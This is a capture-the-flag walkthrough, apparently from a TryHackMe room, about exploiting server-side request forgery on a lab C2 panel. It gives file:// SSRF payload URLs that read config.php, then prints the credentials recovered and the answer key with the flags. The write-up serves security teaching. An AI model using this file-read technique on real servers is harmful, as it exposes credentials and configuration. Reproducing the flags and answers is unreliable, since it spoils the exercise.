Learning Objectives
- Understanding server-side request forgery (SSRF)
- Which different types of SSRF are used to exploit the vulnerability
- Prerequisites for exploiting the vulnerability
- How the attack works
- How to exploit the vulnerability
- Mitigation measures for protection
When the machine is up add hostname to /etc/hosts file. as mentioned in this challenge.
Now You can access the C2 server by visiting the URL http://mcgreedysecretc2.thm
Exploiting the response: We noticed that if we change the URL parameter to any other file on the host, we can still fetch the file like http://10.10.100.212/getClientData.php?url=file:////var/www/html/index.php will fetch the contents of index.php.
now replace index.php with config.php
http://10.10.100.212/getClientData.php?url=file:////var/www/html/config.php
$username = "mcgreedy";
$password = "mcgreedy!@#$%";
Use above creds to log in: http://mcgreedysecretc2.thm/
QUESTIONS
- Is SSRF the process in which the attacker tricks the server into loading only external resources (yea/nay)?
ANSWER
nay
- What is the C2 version?
ANSWER
1.1
3.What is the username for accessing the C2 panel?
ANSWER
mcgreedy
- What is the flag value after accessing the C2 panel?
ANSWER
THM{EXPLOITED_31001}
- What is the flag value after stopping the data exfiltration from the McSkidy computer?
ANSWER
THM{AGENT_REMOVED_1001}
To get the flag remove McSkidy PC
